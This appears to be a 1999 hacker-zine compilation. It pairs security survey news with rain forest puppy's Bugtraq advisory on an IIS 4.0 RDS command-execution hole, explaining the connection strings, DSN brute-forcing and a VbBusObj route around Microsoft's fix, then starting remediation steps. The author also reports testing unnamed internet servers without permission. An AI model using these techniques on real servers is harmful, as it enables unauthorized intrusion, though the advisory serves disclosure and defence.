1997, the Reston, Va., security company said. ICSA is affiliated with Gartner Group Inc. Yet among the technology professionals surveyed at 300 U.S. companies and government organizations, 83% said at least nine out of 10 of their PCs are protected by some form of antivirus software, ICSA said. It's not enough for companies and users to install antivirus software on servers and desktops, said Larry Bridwell, technical program manager for ICSA Labs, which conducted the study. Along with updating the software regularly, companies must implement security policies and educate users, such as warning them not to open documents if they don't know the sender. "It's too dangerous," Bridwell said. "Viruses have become very dynamic," spreading through downloads and attachments. Other findings include the following: Average recovery time for major infections (25 infected PCs or more at once) was 24 hours. The median cost for those kinds of virus disasters, including employee downtime, was $1,750. Some respondents reported that costs totaled $100,000 in a single virus event. By spreading through automated e-mail, Melissa hit a huge portion of users within the first few weeks. Survey sponsors included Computer Associates International Inc., Network Associates Inc., Panda Software and Symantec Corp. Anyone interested in seeing the results can register, free of charge, to view the survey on the ICSA Web site. ICSA/InfoSecurityMag Press release: Study Confirms Increased Security Risks of E-Commerce Contacts: Andy Briney 781-255-0200 abriney@infosecuritymag.com Barbara Rose ICSA (717)-241-3233 brose@icsa.net NORWOOD, MA (JULY 8)--A new study confirms that organizations conducting Internet e-commerce experience far more information security breaches than those that do not conduct e-commerce. According to a survey published today in Information Security magazine (www.infosecuritymag.com), companies conducting business online are 57 percent more likely to experience a proprietary information leak and 24 percent more likely to experience a hacking-related breach. Overall, the number of companies hit by an unauthorized access (hacking/cracking) breach increased nearly 92 percent from 1997 to 1998, the study reports. "The 1999 Information Security Industry Survey" appears in the July 1999 issue of Information Security, published by ICSA Inc., the Reston-Va.-based Internet security company. Co-sponsored by ICSA and Global Integrity Corp., the study also reveals statistics on infosecurity software and hardware use, organizational budgets for security, the use and effectiveness of infosecurity policies, and salary and personnel issues affecting professionals engaged in securing their organization’s data, communications and technology. Overall, companies suffered an average loss of $256,000 to security breaches last year, according to the study. Of the 745 organizations polled in the survey, 91 quantified their financial losses for a total of $23.3 million. "Employee access abuses continue to be the most common security breach, but it’s clear that the growth of e-business has intensified the threat of computer attacks from outside the company’s walls," said Andrew Briney, editor-in-chief of Information Security. The number one security priority of survey respondents was protecting their organizations against such attacks, according to the survey. More than one in five (21 percent) said "preventing hackers/crackers" was the single most pressing security concern in their organization. "Preventing malicious code and viruses" was the biggest concern for 17 percent of respondents, while another 15 percent said "e-mail security." For complete survey results, visit Information Security’s Web site at www.infosecuritymag.com. Based in Norwood, Mass., Information Security magazine is the leading trade monthly for IT, networking and information security practitioners. ICSA, Inc., a Gartner Group affiliate, is the world's source of objective, independent, Internet security assurance services. ICSA headquarters are located in Reston Va,. For more information, contact ICSA at 703-453-0500. @HWA 40.0 Do Handheld Electronics cause Problems with Avionics? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by kshaddri and others Yesterday HNN reported that a man in England had been sentenced to a year in jail for using his cell phone on a an airplane. Not being aircraft designers we wondered just how serious the risks really where. A lot of people took the time to send us some information. Computer-Related Incidents with Commercial Aircraft http://www.rvs.uni-bielefeld.de/publications/Incidents/ Electromagnetic Interference with Aircraft Systems: why worry? http://www.rvs.uni-bielefeld.de/publications/Incidents/DOCS/Research/Rvs/Article/EMI.html While it would seem that passenger electronics could in theory cause problems on board an aircraft it is hard to pin down actual instances of this happening. Clearly more research is needed before people have to spend time in jail. @HWA 41.0 Alert: RDS IIS vulnerability/fix ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 23 Jul 1999 12:21:20 -0500 Reply-To: ".rain.forest.puppy." Sender: Bugtraq List From: ".rain.forest.puppy." Subject: Alert: RDS IIS vulnerability/fix X-To: bugtraq@securityfocus.com To: BUGTRAQ@SECURITYFOCUS.COM #### ALERT! #### RDS/IIS 4.0 Vulnerability and Script #### ALERT! #### By rain forest puppy / ADM / Wiretrip "it...is direct, immediate, and almost 100% guaranteed to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE IS RIDICULOUS!" -Russ Cooper, NTBugtraq "This exploit also does *not* require the presence of any sample web applications or example code...the issue affects at least 50% of the IIS servers I have seen" -Greg Gonzalez, NTBugtraq "Groovy, baby." -Austin Powers, Spy who Shagged Me - - - Table of Contents: 1. Names, PRs and the Media: State of Security Advisories 2. RDS Vulnerability Background 3. *MY* Guess at Greg's RDS Vulnerability 4. Bonus Aspects of My Script 5. More Bonus Features 6. How to Secure Your Server 7. Command Line Options 8. Random Q & A 9. Signoff 10. The code!!!! - 1 - Names, PRs and the Media: State of Security Advisories When I was at DefCon, I had an interview with a reporter who was doing a story on 'hacker handles'. Of course, with a handle like Rain Forest Puppy, I was a sure-win. After a 20 minute chat, the last question he asked me was "What is your real name?" Of course, my response was "does that matter?" Well, to him it did. It seems like it matters to all the big, formal media types and vendors. A perfect example of this would be the whole RDS saga. Greg Gonzalez's original post gave me credit, since he used some of what I talked about in my ODBC advisory posted to Bugtraq earlier (thanks, Greg!). Russ Cooper did a recap, but failed to mention me. Microsoft's advisory acknowledged Russ and Greg as well, sans me. Now, I'm not an egomaniac that needs to see my name splashed over everything. For that matter, those of you who know me personally know how laid back I am concerning most issues. The point I'm trying to make is whether or not a name is 'unsuitable' for mention in something as flashy as a Russ or MS post (although side note, I must admit, Wired and ZDNet have lightened up to this fact, especially lately with all the Dildog and Orifice talk going on). If I remember correctly, David Litchfield got some mentions for various vulnerability findings he had. But everyone referenced him as David Litchfield, not 'Mnemonix', which is his hacker handle (BTW, greetings to Mnemonix. Thanks for serving as an example. :) Even lately, for those of you Bugtraq fans out there (hey, how the hell are you reading this, anyway!?!?!), you'll have noticed gone are the loveable bytes of 'Aleph1' in place of Elias Levy. Now, in Aleph1's defense, I can see justification of the shift. But the general fact that there is a need/trend for a shift is concerning me. The only taboo I can think of for the 'evil' of a hacker handle is the issue of the obvious: anonymity. Apparently I must be running around doing 'very bad things' (funny movie, BTW), and so I need to hide who I really am, right? Uh, no. (For lack of a snappy comeback) I don't want to make this diatribe overly long, since I know you're only here for the exploits anyway :) But seriously, why use a handle? Well, there is a sense of tradition, for one. I shall not explain, because I think it's apparent. The other is a sense of community. If you're going to engage in a security discussion, why not do it with other security professionals. And where can you just so happen to find a large gaggle of people who know about security? Your local IRC server, sitting in #hackphreak (watch out, JP logs), #hackteach, etc. These people have nicknames themselves. So get yourself a nick and join in the conversation! But really, I use an alias. Does that make me evil? If I told you my real name, would that shift your perspective of me into the light of good? We'll get back to this, I want to transgress to another issue. I use a handle. My only collateral at this point is my name, and my name alone. If I find a big hole, post a research paper, etc, it adds nothing but perhaps an "atta'boy" to the accomplishments of my nickname. I've talked to people in real life and held discussions about that 'Rain Forest Puppy' guy, they not knowing I was Rain Forest Puppy. The accomplishments belong to that name, and that name alone...unless I start equating that name with other things. So, let's pretend I did. Let's say I tossed my real name out there, and got that associated with my handle. Now people in real life will equate the findings of Rain Forest Puppy to me. I can add in my company name. Now my company can ride the 'success' (if you will) of my findings as well, just because they're associated with my name. (Come on, you know these situations exist. Transmeta is cool just because the name 'Linus' is involved.) If I equate all kinds of aspects together, I can then distribute the attention (a.k.a. advertising) to them all as well. Think about it....if I found the next remote root compromise in, say, sshd, I could slap not only my handle and name but also my company name (Amazonian Trees, Inc) all over it! Wow, would that not be great marketing for Amazonian Trees, Inc, especially if it ATI's primary service was security related! But hey, it's America. We live to make money, so it seems. So why not do this? Right? Well, 'tis also the trend. Look at all the press releases on security issues. The most recent one was by Greg Gonzalez himself, for his company Information Technologies Enterprises, Inc. The press release is at http://www.infotechent.net/itenews.htm Now, what I find interesting is that Greg has made a post to NTBugtraq about the RDS vulnerability, yet will not release details of the vulnerability until next week. Hmmm. Ok, so he can't release details, but he can release press releases about it. Your point was made with the post to NTBugtraq...the point of the press release is to ride the fame to gain corporate exposure (which I'm equating as an excessive, corporate, political machine type move which isn't all that wonderful). Not to pick on Greg, because it's the trend. Look at WebTrends. They issued a press release on 'their finding of security vulnerabilities in IIS sample scripts' (never mind the fact that I had talked about such in a previous Phrack article last December). The press release is at http://www.webtrends.com/news/releases/release.asp?id=81 Wow, a vendor of a security scanner using the finding of vulnerabilities as free marketing for their products. Well, do it where you can, right? I will move off this subject, because L0pht has a nice long composition on the matter in the Soapbox on their website, at http://www.l0pht.com/~oblivion/soapbox/index.html One interesting statement L0pht makes, going back to Greg Gonzalez and Russ Cooper keeping the details of the RDS vulnerability to themselves for a week: "Now we have software vendors keeping things secret. At least secret for a substantial period of time. Is this the way we want the industry to behave?" Wow, right on, brothers Mudge, Dildog, Weld Pond et al. Greetings, BTW. ---- Credits and Thank Yous ---------------------------------------------- I'd like to take this brief moment to say thank you to L0pht (www.l0pht.com) for helping me test my perl script and taking time to review my advisory. I'd also like to thank Vacuum of www.technotronic.com and Mike Dinowitz of www.houseoffusion.com for their input and testing as well. -------------------------------------------------------------------------- So back to the 'only a handle' thing. You have to understand that I have a different perspective on it all. I publish everything under an anonymous handle. What do I gain from this? Nothing personally. Nadda. Zip. The handle itself may gain some fame, but not me personally. I do not profit from this one way or another. What I do I do because I want to, on my free time--and do it in a manner that is not greedy in any aspect. I don't seek to gain, and in the current setup, I really can't gain a whole hell of a lot. But I'm the bad guy, I forgot. It's much more normal to leverage a security vulnerability as a marketing tool than it is to just 'give' time and research away. Wow, I need to get with the Y2K I guess. Fine then. (Last tangent, then we'll get to the RDS issue, I promise :) So, going back to you seeing me in the light of good.... Could you better relate if you had a 'normal' name? Are you embarrassed to say/use 'Rain Forest Puppy' in conversation/publication? (Well, I mean this generically for all hacker handles, but I'm specifically talking about mine here) Would I be seen as more a security resource/less of a evil hacker if you had a name to associate with my handle? Well, I guess I should make that step. From now on, you can associate Mr. Russell F. Prigogine with the nick Rain Forest Puppy (Hmmm...no, the initials are not mere coincidence...clever, eh?). But since the big 'Russ' on campus is Russ Cooper, NTBugtraq moderator extraordinaire (who believes sample apps are not a security concern worth talking about. Real slick, Russ), I would prefer to have be used Mr. R.F. Prigogine (Mr. optional), if you can't--or don't want to--use the nick Rain Forest Puppy. So there. (As some would say) I sold out (oh, the horror of it). JP, add that to your profile database. While I gather the broken pieces of my dignity we'll move along to what you really want... - 2 - RDS Vulnerability Background Last Friday Greg Gonzalez (re)posted his findings of vulnerabilities in regards to the RDS problems originally detailed in MS98-004, which came out around July 16, '98. He took that issue (which is basically the simple fact that 'Remote Data Service' components allow *remote* access to your *data*....who would have thought?) and combined it with the Jet pipe/VBA delimiter 'feature' I discussed in my recent advisory. The result? 1. You can make remote queries via RDS 2. You can embed NT command line commands in queries Well, that's a pretty good combo. (side note, not to brag or anything, but I mention the fact that RDS can be used to do that in my ODBC advisory, under the title 'Msadc'). But, Greg threw in a twist which supposedly is the kicker: 3. You don't need user IDs (and therefore no password required), does *not* require the presence of any sample Web applications or example code, or even an active database I suppose that's a pretty big kick. Wow, no UIDs/passwords, NO SAMPLE SCRIPTS! Well, I guess that means Russ Cooper will let the post through then... (if you don't get it, go back and re-read section one). So Greg can do all that. And, to reiterate how dangerous this problem really is... "it...is direct, immediate, and almost 100% guaranteed to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE IS RIDICULOUS!" -Russ Cooper, NTBugtraq "This exploit also does *not* require the presence of any sample web applications or example code...the issue affects at least 50% of the IIS servers I have seen" -Greg Gonzalez, NTBugtraq *** MEDIA FOLKS *** As it seems it's fun to attach dollar loss amounts advisories, I will say the potential amount of damage, due to the fact that at least 50% of all IIS servers Greg has seen (hopefully he's seen a lot) are vulnerable, using my sophisticated reliable statistical computation method that is authoritative, I'd place damage loss somewhere in the 'close to Bill Gates salary(tm)' range. Now, the sad part. As I mentioned before, both Greg and Russ (from this point on, all instances of 'Russ' refer to Russ Cooper, and not the name R. F. Prigogine) both know the details of this vulnerability. And yet they are keeping them amongst themselves until next week. Does this even disturb anyone? Greg says at least 50% of the IIS servers are vulnerable... DO WE WANT RUSS COOPER WITH THE KEYS TO 50% OF IIS SERVER ON THE INTERNET? Ok, I have a scenario that's the same in principle, but will disturb people even more: ---- Begin same scenario ------------------------------------------------ Rain Forest Puppy (or R. F. Prigogine, if it makes you feel better/is more visually pleasing) has found a hole in the latest build of Apache web server. There's a hole. I will announce there's a hole. I'll write up a few PRs as well. But I will not tell you the exact nature of it. Don't worry, Apache group will code a fix, and you'll be all set in a jiffy. In the meantime, I'm not going to release the details of the exploit of the hole. Instead I'm going to just keep it to myself....and my good buddies Vacuum, Antilove, Stranger, and the rest of the Wiretrip and ADM crews. ------------------------------------------------------------------------- Hmmm....I bet *that* disturbed you. How about a better translation: ---- Begin translated same scenario ------------------------------------- I, RFP, have found a hole in Apache that I will not tell you about until later, but in the meantime, me and my hacker buddies will know about it! Nnnnnnaaaaaaayyyyyyaaaaahhhhhh! So sit back and feel helpless. ------------------------------------------------------------------------- What's the difference? Only the integrity of the people involved. Again, a name thing perhaps. Russ Cooper, Greg Gonzalez, they're Ok. Rain Forest Puppy, Antilove, nope, that's scary. You don't even know if Greg Gonzalez isn't really a hacker that goes by 'Digital Killer'. I push for the point that no matter who it is in any case, it's wrong. Elias Levy would have told everyone the bug. :) NTBugtraq = moderated disclosure. Hmmm. I still like Russ's "Would you pay?" Administrivia from Feb 99, in which he says: "Someone else makes the Security Portal and you get what they think you need" As oppose to getting what Russ thinks we need instead? It all depends on whether or not the other guy denies posts about sample scripts....(if you *still* don't get it, re-read section one AGAIN). Ok, ok, so that RDS background turned more into a political thing. Well, that's because it is. At this point, Russ and Greg are have the keys to IIS servers. I don't know about you, but I'm not liking it. So I'm getting off my ass and doing something. Besides the fact that this is all published stuff at this point. Also, I may be considered 'irresponsible' for posting the exploit. Now, I would say *maybe* it would be debatable if I had posted *only* the exploit. But I have posted not only a very long diatribe, but also my guess of the vulnerability, which includes examples of analysis and theory. I also detailed out how to secure your server, from this hole in particular as well as other security problems in general. My hopes are to educate people on what the problem is, and how I went about finding it so that they can perhaps learn how to do it themselves. Education. It's the key, and that's what I'm trying to do. No, no vendor education...ADMIN education. USER education. I know I will probably be futile as a whole in the end, but maybe a few people will learn something, and that's all that matters to me. - 3 - *MY* Guess at Greg's RDS Vulnerability (I say 'guess' because I may not be right. But in any event, I wouldn't be writing all this unless I found something moderately interesting ;) Ok, so Greg's RDS vulnerability has three main aspects: 1. You only need RDSServer.DataFactory component 2. It uses Jet queries with my embedded VBA via pipes trick 3. You don't need userIDs (and therefore no password required), does *not* require the presence of any sample Web applications or example code, or even an active database Now, for those of you who don't know, RDS is basically a way to do remote data queries to a server. This is done over the web. Basically your client app communicates via HTTP to the /msadc/msadcs.dll on your server. The msadcs.dll exposes the RDSServer.DataFactory object, or better known as the AdvancedDataFactory. Now AdvancedDataFactory only has four methods, so we're kind of limited on what we can do. We can CreateRecordSet, Query, SubmitChanges, and ConvertToString. Query and SubmitChanges require a valid database to work upon. The other two are just data mangling functions. So there you have it, that's what we have to work with. I played with CreateRecordSet and ConvertToString. This actually relays data from the client, to the server, and back. My hopes was that somewhere in there I could slip one of my pipe-VBA-shells in there and do fun stuff. But nope, all they did was regurgitate the data in a different flavor. Oh well. SubmitChanges just basically does an elaborate UPDATE/INSERT, where it just syncs the server's database with the client's recordset. So that leaves Query. Well Query lets us run queries against an (existing) database. And we know we can embed our pipe-VBA-shells in queries, so Query looks good. But this is nothing spectacular. And there is one catch: the need for an existing database. We need to pass a DSN to the ActiveDataFactory to actually run the query on. The problem with the DSN is that: 1. DSNs can require UIDs and passwords 2. There's no way to get a list of available DSNs (** through RDSServer.DataFactory functions, that I'm aware of **) 3. I'd say a DSN constitutes an 'active' database So DSNs blow away point 3 of our known things about Greg's RDS vulnerability. What if we can get around using DSNs? Well, we can. See, you can go the easy route by specifying "DSN=rfp", and then the server keeps all the internal information about that DSN, including driver, actually database file location (if it's a file-based driver), UID, password, connection parameters, etc. Well, what's fun is that we can directly give all that stuff in the query setup instead of a DSN. Let's say we setup a DSN named 'rfp' (for Rain Forest Puppy or R. F. Prigogine). We will use these parameters: DSN name 'rfp' Microsoft Access (Jet) driver c:\rfp.mdb for our database UID will be 'rfp' password will be 'prigogine' So by invoking "DSN=rfp", the server knows to use the Access driver on the c:\rfp.mdb file. DSNs are a nice tight way to precompose all that information. Or we can do it on the fly. Rather than issuing a "DSN=rfp" connect string, I can use instead: "driver={Microsoft Access Driver (*.mdb)}; dbq=c:\rfp.mdb;" This will still invoke the Access (Jet) driver, and tell it to directly use c:\rfp.mdb. No UID. No password. No even worrying about if/what DSNs exist. In the words of Cartman, "Sweet". That whacks out part of known point #3 (no UID or password). We're going to use the RDSServer.DataFactory control (known point #1), and we're going to use the Access driver, with fun pipe-VBA-shell features (known point #2). We're not using any other web sample scripts, so that cuts out another portion of known point #3. Oh, we're so close...can you taste it? (and what does it taste like? chicken?) There's still one minor detail. Notice we have to specify the 'dbq=' parameter in the connection setup. And this needs to be a valid file. If it's not, the SQL engine on the server side will fail and return errors before it even gets around to looking at our queries. But damn, we need an .mdb file to connect to. Well, if you look in the Access ODBC reference on Microsoft's website (which sucks, half the links were broken at various moments through the night while sifting through it...go MS. I don't blame you though--you probably engineered your site/servers with Microsoft products, and that explains it right there) you will see that you can pass a CREATE_DB parameter to the Access driver. This will cause the driver to construct a valid (empty) .mdb file. Woohoo! (not to be confused with w00w00; the former is an expression of joy, the latter is a cool group of guys that I had the fortune of hanging out with at DefCon) So in our connection setup we pass a "CREATE_DB=c:\rfp.mdb" attribute with everything else and low and behold, it...... ----- Some words about my sponsors --------------------------------------- -- www.technotronic.com Technotronic! Great place! Run by fellow Wiretrip'er Vacuum, who is also a co-founder of Rhino9 (before Rhino9 'disbanded'; Neon, Horizon, Xaph: come back to the US!), boasting a slick HTML design recently redone by yours truly (Rain Forest Puppy/R. F. Prigogine), it's definitely a good site for the latest security information--especially while PacketStorm is struggling to get back on its feet (thanks, JP. Now die. What, you're sueing me now?!?) While you're there, be sure to check out: * Winfingerprint! -- coded by Vacuum, this tool lets you remotely query a windows box and see if it's a PDC, BDC, Member server, SQL server, etc. Also look for the Unix port of it by me sometime soon (after I finish all this RDS stuff) * Horizon's Page! -- that's right. Elite HTML coded by Humble himself. Problem was he didn't know where to put the shell code...? J/K :) The URL is /horizon/ * Newest R9 Tools! -- coming soon. Before 3/4ths of Rhino9 moved to Germany, there was one last code fest, and some fun binaries came out of it. Look for them soon! Technotronic also has the R9 mirror at rhino9.technotronic.com -- www.l0pht.com L - zero - p - h - t Everybody knows L0pht (even senators!) A very active 'independant security (watchdog) group' who include Dr. Mudge & Dildog (BO2K creator). While you're there, be sure to check out: * L0phtcrack! -- one of the best NT password crackers out there! This will prove highly useful if you use my script do dump the SAM and grab the backup (not that I encourage hacking...I've done this many times in LEGIT contracted audits). It's a personal tool I've standarized on. * Advisories! -- L0pht releases a very nice variety of advisories, from Windows DLL problems and Cold Fusion script problems to Unix race conditions and symlink vulnerabilities. * NFR Modules! -- they've teamed up with NFR to be the supplier of many interesting N-code/NFR modules. They have a nice selection for your popular network attacks. ** plus I must note that the Palm Pilot stuff, Soapbox, and BBS are pretty awesome as well! -- www.houseoffusion.com A great independant Cold Fusion site! The site of a great friend of mine, Mike Dinowitz, who is my 'go to' man for all things Cold Fusion and has helped me out immensely with various Cold Fusion language issues (read: helped me work through some of the various Cold Fusion exploits that have surfaced). He does offer training for Cold Fusion...see 'Training Info' under ''. He co-authored "Advanced Cold Fusion 4.0 Application Development" and "Cold Fusion Web Application Construction Kit" vols 2 and 3, and was the founding member of Team Allaire. Plus, he's an all-around good guy(tm). Also an editor of CF Advisor, at www.cfadvisor.com. While you're there, be sure to check out: * MunchkinLAN! -- a CF based web scanner, which is actually very minimal code and runs out of an Access db. * Mike's Mods! -- many modifications to the Cold Fusion Forums scripts, which include speed/operation improvements. * CF-Talk! -- Mike is the moderator/owner of the CF-Talk list, which is a high traffic list discussing Cold Fusion related development issues, security, etc. -- Thanks again to all of the above! ------------------------------------------------------------------------- ...didn't work. Damn. The problem was that it was passing the CREATE_DB parameter during the SQLDriverConnect() phase, and that just isn't going to cut it. We need to issue a SQLConfigDataSource() call (I think that was it...my mind is a mush of ODBC/SQL/RDS/ADO/OLEDB/FMP API right now) to get CREATE_DB to do it's thing, and RDSServer.DataFactory.Query just wasn't going to give us love. So, after struggling with other nuances and ideas, I concluded that I couldn't make a DSN, or a .mdb from scratch using Access SQL via RDSServer.DataFactory without connecting to a database/.mdb beforehand. (**NOTE: if you know how this can be done, EMAIL ME! I WILL TRADE YOU 0DAY! :) rfp@wiretrip.net ) Well damn, so we need a database to make this work. Any 'ol database will do (hell, even the WINS or DHCP .mdb should work >:). But unfortunately, none come by default on a standard NT install. Bummer. But wait....all is not lost.... It seems when you do a 'typical' or better install with Option Pack 4, a particular .mdb is installed...namely the btcustmr.mdb which is installed to %systemroot%\help\iis\htm\tutorial\. Microsoft saves the day! They're just so damn efficient at helping us hack their own product... To get IIS 4.0 you practically need to install Option Pack 4, which will also then install MDAC 1.5--this is good. Let's just hope they didn't pick the 'minimal' install... The last catch is that we need to figure out what %systemroot%. On the majority of the systems it will probably be c:\winnt, d:\winnt, e:\winnt, or f:\winnt (don't laugh, mine is f:). I guess some wacko might do \win, \windows, \nt, and if you upgrade it may be \winnt351 or \winnt35. Well, we can do a little 'brute force' on all those combinations until one works. Oh, and no, you can't do "dbq=%systemroot%\help\iis\htm\tutorial\btcustmr.mdb"...the SQL driver pukes. So that's my guess! Mr. Gonzalez is using a connection string similar to "driver={Microsoft Access Driver (*.mdb)}; dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;" with a query that contains one of the pipe-VBA-shell commands. Now, I think this technically meets all the known points of the exploit--the only fuzzy one is where Greg mentions "no need of an *active* database". Now, I may be reading into it, but btcustmr.mdb is hardly active. It's a totally unused .mdb sitting in a directory most people probably didn't know existed. Just to double check, I did a quick little test...and six of the ten servers I picked off the Internet were susceptible to this method. That'd a tad better than Greg's 50%, but I had a small population sample, so I'll give him the benefit of the doubt. Now, I obviously could be wrong. Maybe Greg found a way to create the .mdb, or some other way where he doesn't need to rely on the existence of btcustmr.mdb. I'm not claiming to be a SQL/database wiz--actually, I hate database applications. Period. They're gross. But I put up with it for the better good of the Internet. :) But yes, I could be wrong, and I'm willing to admit it. Let me also mention the contenders. They were contenders, but definitely did not make the final round because as much as the 'look' and 'smelled' exploitable, I couldn't get them to crack: 1. Data Shape Provider. This already has hooks into the VBA interpreter ( you can put VBA commands in the CALC() function--except it lacks shell()), and is a primary suspect in my eyes. The bonus is that you do *not* need any database files to use this. Well, barring the fact that I really don't know what I'm doing, I played around with it trying to feed some pipe-VBA-shells to it and whatnot, but couldn't get anything interesting to happen. Now, this is installed by default, has VBA hooks already, doesn't need a database, etc. I say this fits the description more that the btcustmr.mdb thing. And it's just all together 'cooler'. 2. Index Server Provider. Now, not all places use Index Server, so I highly doubted this was the route, but it is a contender. Again, you don't need a database file, so that's a bonus. I tried the usual pipe-VBA-shell commands, but no go either. If I really had to choose, I'd say the exploit was in the Data Shape Provider (which Microsoft also warned of in the advisory). But since I couldn't get it to give me love, I went with btcustmr.mdb. - 4 - Bonus Aspects of My Script So, yes, I could be wrong. But I figure why not just feature pack this script to *really* kick some ass? Well, so, I wasted a few brains cells (the things I do for you people...jeez) and thought of some good things to toss into the code. I figure hey, might as well make this a useful tool! The first one is pretty obvious. There are many applications on the market, that would be used on a server, that would make/require a DSN. For instance Cold Fusion creates a few DSNs, as does iHTML. Some of the sample apps that come with IIS create DSNs as well, and the MDAC makes a few too. All these potential DSNs. Remember, it only takes one DSN to work. So if we wanted to, we could scan to see if any of a number of default DSNs exist, and if they do, use them. An extension of this would be user created DSNs. Again, all we need is the DSN name, so we can scan for what are 'psychologically' common DSN names. For instance test, web, data, database, www, db, and sql are common type DSN names. Basically, if you supply a dictionary file of DSN names you want to use, the script will sit there and brute force, a la a remote password cracker on the DSN names. Of course, we'd need DSNs with the Access Driver. But what's nice is that if we connect to a valid DSN with an invalid SQL query, we'll get back the name of the driver in the error message. So it's a nice way to check. Then we can also do an inverse type thing--instead of looking for common DSNs to connect to, we can look for common .mdbs to connect to. For instance MS Cert Server, DHCP, and WINS all use .mdbs, as well as particular sample scripts, SDKs, etc. We can just try to connect to them directly. If we find one, rather than dealing with the table information within the .mdb, we can just CREATE TABLE on it first, and then use the table we just created. Very simple. Another interesting feature is dumping the root scope paths from Index Server. Basically it's a query of "Select paths from scope()". This is useful because it can provide us with useful directory information...since one of the tricky problems is determining location of html files and systemroot (although they're most likely guessable, that's not always the case). So I tossed this in for kicks, although it doesn't run 'inline' with the actually DSN/.mdb checks. You invoke this functionality separately. The last extra functionality, but the easiest of them all, is to see if /scripts/tools/makedsn.exe exists on the webserver. If it does, we can make a DSN and define the .mdb file to use, and then use it right away. In my particular script I make a DSN named 'wicca'. (Greetings to Simple Nomad! I wish you could have been around at DefCon. Next time.) So, wow. Lots of ways to get a database connection. My RDS script tries them in the following order, continuing until successful: - try raw driver connect to btcustmr.mdb - try to create a DSN with /scripts/tools/makedsn.exe - look for common DSNs - look for common .mdbs - try 'dictionary' attack on user DSNs And separately you can query Index Server to get the paths information (Warning: this could be a lot of information! The script automatically sorts out common directories). ----- Campaign solicitation -------------------------------------------- XOR!! The unofficial AES candidate! There are many reasons why you should support XOR: 1. It's mad fast! 2. It can be implemented in very little code 3. It will run with decent performance even on the meekest of Casio watches 4. The ciphertext doesn't look like the plaintext--this is good. 5. Stream, block, chained, unchained, XOR does it all! 6. So many companies already use it as their encryption algo of choice! So join the 'AES XOR y2k == 8w8' campaign today! ------------------------------------------------------------------------ One interesting feature that's almost necessary is a 'resume' mode. Imagine you just scanned a webserver, spending the last 5 minutes trying all the combinations of valid default .mdbs, valid DSNs, etc. Finally it cracks and you get one, and you run your command. Well, what if you want to run another command? Do you have to go through that rigmarole again? Well, not with my script. :) When you make a successful connection, it writes out a file called 'rds.save'. Then, you can just use the 'resume' switch (-R), with no other options. It will read in rds.save, and let you run a command against the successful connection again right away. - 5 - More Bonus Features Well so far, I haven't really provided anything really original. I'm all for originality. So I racked my brain. I poured through all of Microsoft's ADO/OLEDB/RDS/ODBC documentation. I read their advisory. I disassembled billions of .dlls. And then inspiration struck. You see, MDAC 1.5 installs *three* objects by default. RDSServer.DataFactory, which we've discussed before. AdvancedDataFactory, which is really an alias to RDSServer.DataFactory. But there's also one called VbBusObj.VbBusObjCls. This is really an example of a middle-tier business object of the possible three-tier RDS model. It implements four functions: Test, GetMachineName, ExecuteSQL, and GetRecordSet. Test does nothing for us. GetMachineName is fun just because it returns the machines NetBIOS name, which is useful in many cases. So I tossed it in. You invoke it with the -N switch. Now ExecuteSQL and GetRecordSet do basically the same thing, run a SQL query. The difference is ExecuteSQL just returns how many records we affected, while GetRecordSet returns the records as actual data. I chose to use GetRecordSet because it integrated better with the rest of the code, since it's return was strikingly familiar to the output from the RDSServer.DataFactory control. This is not a big deal, other than a bandwidth issue, but we're not talking more than a few K of data here anyway. I know you're probably thinking 'uh, so what. There's another way to do the same thing. I mean the GetMachineName thing is cool, but not all that much special'. Well, no. Your wrong. And let me tell you why. Starting with MDAC 2.0 you can define custom handlers. Basically, rather than RDSServer.DataFactory going straight to the database driver, it takes a side trip through a handler. This is the fix Microsoft mentioned in their security advisory at http://www.microsoft.com/security/bulletins/ms99-025.asp They recommend you switch the following registry entry [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DataFactory\HandlerInfo] "handlerRequired"=dword:00000001 "DefaultHandler"="MSDFMAP.Handler" which tells RDSServer.DataFactory that RDS *must* use a handler, and that the default handler is MSDFMAP.Handler. Then you can use msdfmap.ini to specify options for denying certain connections, etc. Microsoft even supplies HANDSAFE.EXE, which auto-extracts to a .reg file that sets the above registry keys, plus a list of safe handlers. So if you need RDS, the preferred upgrade route from MDAC 1.5 is to install the latest MDAC 2.x, and then run HANDSAFE.EXE to make sure to limit outside queries by using handlers, which are controlled. Well, all this fun handler crud is implemented in RDSServer.DataFactory. So we're kinda screwed when we run RDSServer.DataFactory.Query (as we should be, as this is the fix). Well, guess what. VbBusObj.VbBusObjCls doesn't care about handlers. We just effectively bypassed the handler thing. Wait, let me spell it out for you: THE MICROSOFT CUSTOM HANDLER FIX DOES NOT PREVENT THIS. WE CAN STILL RUN QUERIES. HANDSAFE.EXE/CUSTOM HANDLERS (THE RECOMMENDED MICROSOFT FIX) DOES NOT PROTECT AGAINST THIS. Wow. So we just use VbBusObj.VbBusObjCls instead of RDSServer.DataFactory. Simple enough. I think this is definately a worthwhile feature. You can cause the script to use VbBusObj by specifying the -V option. But I will admit: VbBusObj.VbBusObjCls is not always installed. So this is not always the case. But it's a case, none-the-less. NOTE: When using VbBusObj, I suggest you use -N *FIRST*. If you get a valid NetBIOS name back, VbBusObj exists. If you use -V without verifying VbBusObj exists, and in fact it doesn't exist, the script/connection will HANG! So just humor me first and use -N first to see if -V is a valid option. I could have automated it, but then again, why should I allow you to be lazy? Now Microsoft does make some other mentions of just disabling RDS all together. While this will work, unfortunately, RDS exists for a reason, and many people are using it legitimately. That means there are people who can't disable it because they use it. So what to do? - 6 - How to Secure Your Server Ok, I've talked so much on how to break this stuff. How about helping fix the matter? Well sure. Basically we have to situations: those who need RDS, and those who don't. I shall address both. Those who need RDS: I agree with Microsoft--custom handlers are the way to go. Unfortunately, there's that pesky VbBusObj to deal with. This is actually not that hard. You need to delete the VbBusObj references. Simply delete the following registry key HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/ W3SVC/Parameters/ADCLaunch/VbBusObj.VbBusObjCls (line broken for clarity) For peace of mind you can also delete vbbusobj.dll, which is installed at (pending root drives) c:\program files\common files\system\msadc\samples\selector\ middle_tier\vbbusobj\vbbusobj.dll (again, line broken for clarity) That should be it. Now, you'll need to read about custom handler creation, and 